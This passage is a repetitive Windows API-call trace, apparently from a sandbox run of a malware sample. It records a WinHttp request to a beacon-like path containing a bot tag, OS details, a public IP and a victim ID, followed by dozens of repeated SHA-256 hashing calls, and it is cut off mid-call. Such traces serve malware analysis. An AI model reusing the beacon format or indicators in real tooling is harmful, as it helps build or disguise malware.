pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/0/Windows 10 x64/1107/88.153.199.169/DEBD3DFEDF418C3E99F8759943821CA7364C37894CA12183A3519D4AA90C04E2/DrtbzVJblRThr1hHxdjxBrV7PRFhV/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7581f0 [0147.196] WinHttpSetOption (hInternet=0x7581f0, dwOption=0x1f, lpBuffer=0xce118, dwBufferLength=0x4) returned 1 [0147.196] WinHttpSendRequest (hRequest=0x7581f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0147.914] WinHttpReceiveResponse (hRequest=0x7581f0, lpReserved=0x0) returned 1 [0147.914] WinHttpQueryHeaders (in: hRequest=0x7581f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce114, lpdwBufferLength=0xce11c, lpdwIndex=0x0 | out: lpBuffer=0xce114*, lpdwBufferLength=0xce11c*=0x4, lpdwIndex=0x0) returned 1 [0147.914] WinHttpQueryDataAvailable (in: hRequest=0x7581f0, lpdwNumberOfBytesAvailable=0xce1f0 | out: lpdwNumberOfBytesAvailable=0xce1f0*=0x3ac) returned 1 [0147.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x3b0) returned 0x32e41af0 [0147.914] WinHttpReadData (in: hRequest=0x7581f0, lpBuffer=0x32e41af0, dwNumberOfBytesToRead=0x3ac, lpdwNumberOfBytesRead=0xce1f4 | out: lpBuffer=0x32e41af0*, lpdwNumberOfBytesRead=0xce1f4*=0x3ac) returned 1 [0147.914] WinHttpQueryDataAvailable (in: hRequest=0x7581f0, lpdwNumberOfBytesAvailable=0xce1f0 | out: lpdwNumberOfBytesAvailable=0xce1f0*=0x0) returned 1 [0147.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x340) returned 0x32e42330 [0147.914] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0147.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59e10 [0147.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e4ee50 [0147.914] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.915] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.915] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x20, dwFlags=0x0) returned 1 [0147.915] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a4a0 [0147.915] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a4a0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a4a0, pdwDataLen=0xceaec) returned 1 [0147.915] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.915] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.915] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0147.916] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.916] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x40, dwFlags=0x0) returned 1 [0147.916] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.916] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a3b0 [0147.916] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a3b0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a3b0, pdwDataLen=0xceaec) returned 1 [0147.916] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.916] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0147.916] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.917] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.917] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x60, dwFlags=0x0) returned 1 [0147.917] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a1a0 [0147.917] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5a1a0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a1a0, pdwDataLen=0xceaec) returned 1 [0147.917] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.917] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.917] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0147.917] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.917] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x80, dwFlags=0x0) returned 1 [0147.917] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a440 [0147.917] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5a440, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a440, pdwDataLen=0xceaec) returned 1 [0147.917] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.918] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0147.918] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0147.918] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.918] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0147.918] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a050 [0147.918] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5a050, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a050, pdwDataLen=0xceaec) returned 1 [0147.918] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.918] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0147.918] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.919] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.919] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0147.919] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.919] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59ed0 [0147.919] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59ed0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59ed0, pdwDataLen=0xceaec) returned 1 [0147.919] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.919] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.919] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.919] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.920] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0147.920] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59b40 [0147.920] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59b40, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59b40, pdwDataLen=0xceaec) returned 1 [0147.920] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.920] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.920] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0147.920] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.920] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.920] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59cc0 [0147.920] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59cc0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59cc0, pdwDataLen=0xceaec) returned 1 [0147.920] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.920] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0147.920] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0147.921] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.921] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x120, dwFlags=0x0) returned 1 [0147.921] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.921] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a200 [0147.921] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5a200, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a200, pdwDataLen=0xceaec) returned 1 [0147.921] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.921] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0147.921] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.922] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.922] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x140, dwFlags=0x0) returned 1 [0147.922] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a230 [0147.922] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5a230, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a230, pdwDataLen=0xceaec) returned 1 [0147.922] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.922] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.922] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0147.922] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.922] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x160, dwFlags=0x0) returned 1 [0147.922] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59bd0 [0147.922] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59bd0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59bd0, pdwDataLen=0xceaec) returned 1 [0147.922] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.922] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0147.922] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0147.923] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.923] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x180, dwFlags=0x0) returned 1 [0147.923] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.923] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a290 [0147.923] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e5a290, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a290, pdwDataLen=0xceaec) returned 1 [0147.923] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.923] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0147.923] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0147.924] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.924] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0147.924] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a6e0 [0147.924] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a6e0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a6e0, pdwDataLen=0xceaec) returned 1 [0147.924] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.924] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0147.924] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0147.924] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.924] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0147.924] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a410 [0147.924] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e5a410, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a410, pdwDataLen=0xceaec) returned 1 [0147.924] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.925] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0147.925] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0147.925] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.925] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0147.925] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.925] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a5f0 [0147.925] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a5f0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a5f0, pdwDataLen=0xceaec) returned 1 [0147.925] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.925] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0147.925] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0147.926] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.926] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x200, dwFlags=0x0) returned 1 [0147.926] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a2c0 [0147.926] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a2c0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a2c0, pdwDataLen=0xceaec) returned 1 [0147.926] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.926] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0147.926] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0147.926] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.926] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x220, dwFlags=0x0) returned 1 [0147.927] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59cf0 [0147.927] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59cf0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59cf0, pdwDataLen=0xceaec) returned 1 [0147.927] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.927] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0147.927] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0147.927] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.927] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x240, dwFlags=0x0) returned 1 [0147.927] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a4d0 [0147.927] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e5a4d0, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a4d0, pdwDataLen=0xceaec) returned 1 [0147.927] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.927] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0147.927] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0147.928] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.928] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x260, dwFlags=0x0) returned 1 [0147.928] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.928] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59d20 [0147.928] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59d20, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59d20, pdwDataLen=0xceaec) returned 1 [0147.928] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.928] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0147.928] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.929] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.929] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x280, dwFlags=0x0) returned 1 [0147.929] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a620 [0147.929] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e5a620, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a620, pdwDataLen=0xceaec) returned 1 [0147.929] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.929] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.929] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0147.929] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.929] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0147.929] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59d50 [0147.929] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e59d50, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59d50, pdwDataLen=0xceaec) returned 1 [0147.929] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.929] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0147.930] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0147.930] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.930] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0147.930] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59d80 [0147.930] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x2, pbData=0x32e59d80, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e59d80, pdwDataLen=0xceaec) returned 1 [0147.930] CryptDestroyHash (hHash=0x332b7890) returned 1 [0147.930] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0147.930] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0147.931] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.931] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0147.931] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xceaec, pdwDataLen=0xceafc, dwFlags=0x0 | out: pbData=0xceaec, pdwDataLen=0xceafc) returned 1 [0147.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a320 [0147.931] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e5a320, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0x32e5a320, pdwDataLen=0xceaec) returned 1 [0147.931] CryptDestroyHash (hHash=0x332b7900) returned 1 [0147.931] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0147.931] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0147.931] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0147.931] CryptHashData (hHash=0x332b7660, 